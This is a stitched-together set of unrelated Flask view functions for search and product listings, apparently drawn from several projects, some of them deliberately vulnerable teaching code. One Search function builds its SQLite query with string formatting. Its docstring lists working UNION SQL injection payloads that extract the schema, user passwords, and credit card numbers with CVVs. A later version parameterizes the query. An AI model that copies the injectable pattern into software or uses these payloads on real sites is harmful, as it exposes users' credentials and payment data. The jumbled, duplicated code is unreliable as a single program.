def search():
journals = Journal.query.all()
form = SearchForm(request.form)
if request.method == 'POST' and form.validate():
keyword = form.keyword.data
return render_template('search/search.html', journals=journals, form=form)
def search():
albums = Album.query.all()
artists = Artist.query.all()
form = SearchForm(request.form)
if request.method == 'POST' and form.validate():
keyword = form.keyword.data
return render_template('search/search.html', albums=albums, artists=artists, form=form)
def Search(product):
if 'username' in session:
user = User(session['username'], session['email'], session['password'],
session['question'], session['answer'])
else:
user = None
# For search
conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
c = conn.cursor()
c.execute(
"SELECT rowid, * FROM products WHERE name = '{}' ".format(product))
results = c.fetchall()
print(results)
conn.close()
"""
UNION SQL INJECTION
EXFILTRATE DB SCHEMA
' UNION SELECT * FROM x-- (Error: No such table x)
' UNION SELECT '1' FROM sqlite_master-- (Error: SELECTs to the left and right of UNION do not have the same number of result columns)
' UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8' FROM sqlite_master-- (Returns all products)
' UNION SELECT '1', sql, '3', '4', '5', '6', '7', '8' FROM sqlite_master-- (Returns all tables in schema)
(After knowing fields in user table)
GET ALL USER CREDENTIALS
' UNION SELECT '1', username, '3', '4', password, '6', '7', '8' FROM users--
GET CREDIT CARD DETAILS
' UNION SELECT '1', ccnumber, '3', '4', cvv, '6', '7', '8' FROM paymentdetails--
GET HIDDEN PRODUCTS
' UNION SELECT rowid, name, image, '4', cost_price, '6', '7', '8' FROM products--
"""
# Search Form
form = SearchForm(request.form)
if request.method == "POST":
# Pass prodduct into url directly (Weak code)
return redirect(url_for('shopping.Search', product=form.Search.data))
return render_template("shopping/Search.html",
user=user,
products=results,
search=product,
form=form)
def Products():
if 'username' in session:
user = User(session['username'], session['email'], session['password'], session['question'], session['answer'])
else:
user = None
conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
c = conn.cursor()
c.execute("SELECT rowid, * FROM products")
products = c.fetchall()
conn.close()
search = SearchForm(request.form)
if request.method == "POST":
# Pass product into url directly (Weak code)
return redirect(url_for('shopping.Search', product=search.Search.data))
return render_template("shopping/Products.html", user=user, form=search, products=products)
def Products():
try:
current_user.get_username()
user = current_user
except:
user = None
conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
c = conn.cursor()
c.execute("SELECT * FROM products")
products = c.fetchall()
conn.close()
search = SearchForm(request.form)
if request.method == "POST":
return redirect(url_for('shopping.Search', product=search.Search.data))
return render_template("shopping/Products.html",
user=user,
form=search,
products=products)
def home():
# Get the results from the forms
form = SearchForm(request.form)
if request.method == 'POST':
# Set form values to session cookie
session['searchType'] = form.searchType.data
session['searchText'] = form.searchText.data
return redirect(url_for('searchResults'))
# Generate 5 random beer id to show on the home page
randBeers = []
for i in range(0, 5):
randID = int(round(random.random() * 253,0))
randBeers.append(randID);
# Get 5 beers from the beers table
query = """SELECT beers.beer_id, beers.name, beers.abv, beer_types.name, brewers.name FROM beers INNER JOIN brewers ON beers.brewer_id = brewers.brewer_id INNER JOIN beer_types ON beers.type_id = beer_types.type_id WHERE beer_id IN (%s,%s,%s,%s,%s) AND beers.inactive = 0;""" %(randBeers[0],randBeers[1],randBeers[2],randBeers[3],randBeers[4])
results = db_connect.execute_query(query)
# Create object for data returned
payload = []
content = {}
for result in results:
abv = result[2] * 100
abvStr = str(abv) + '%'
content = {'beer_id': result[0], 'name': result[1], 'abv': abvStr, 'style': result[3], 'brewer': result[4], 'route': 'home', 'order': '+'}
payload.append(content)
randBeersTable = RandomTable(payload)
return render_template('home.html', title='Home', form=form,randBeersTable=randBeersTable)
def Search(product):
try:
current_user.get_username()
user = current_user
except:
user = None
# For search
conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
c = conn.cursor()
c.execute("SELECT rowid, * FROM products WHERE name=? ", (product, ))
results = c.fetchall()
conn.close()
# Search Form
form = SearchForm(request.form)
if request.method == "POST":
return redirect(url_for('shopping.Search', product=form.Search.data))
return render_template("shopping/Search.html",
user=user,
products=results,
search=product,
form=form)
def search():
form = SearchForm(request.form)
map = None
if request.method == 'POST' and form.validate():
from flask_googlemaps import GoogleMaps, Map
devices_data = {} # dict to store data of devices
devices_location = {} # dict to store coordinates of devices
# json_data = request.get_json(silent=True)
# get json request
kensa = form.kensa.data
chiryo = form.chiryo.data
shikkan = form.shikkan.data
area = form.area.data
from_time = form.from_time.data
to_time = form.to_time.data
hospital = Hospitals.query.first()
json_data = { # for testing
'user': {
'x': 35.94149,
'y': 139.771598
},
'devices': [{
'id': '0001',
'x': hospital.latitude,
'y': hospital.longitude,
'data': 'something'
}]
}
user_location = (json_data['user']['x'], json_data['user']['y'])
# json example : { 'user' : { 'x' : '300' , 'y' : '300' } }
# get user_location from json & store as turple (x, y)
devices_data[str(
json_data['devices'][0]['id'])] = (json_data['devices'][0]['data'])
devices_location[str(
json_data['devices'][0]['id'])] = (json_data['devices'][0]['x'],
json_data['devices'][0]['y'])
# json example : { 'devices' : { 'id' : '0001', x' : '500', 'y' : '500' }, { ... } }
# get device_location from json & store turple (x, y) in dictionary with device id as key
# use for statements or something to get more locations from more devices
circle = { # draw circle on map (user_location as center)
'stroke_color': '#0000FF',
'stroke_opacity': .5,
'stroke_weight': 5,
# line(stroke) style
'fill_color': '#FFFFFF',
'fill_opacity': .2,
# fill style
'center': { # set circle to user_location
'lat': user_location[0],
'lng': user_location[1]
},
'radius': 100 # circle size (50 meters)
}
map = Map(
identifier="map",
varname="map",
# set identifier, varname
lat=user_location[0],
lng=user_location[1],
# set map base to user_location
zoom=12, # set zoomlevel
markers=[{
'lat': devices_location['0001'][0],
'lng': devices_location['0001'][1],
'infobox': devices_data['0001']
}],
# set markers to location of devices
circles=[circle] # pass circles
)
return render_template('search.html',
map=map,
form=form,
hospital=hospital)
return render_template('search.html', form=form)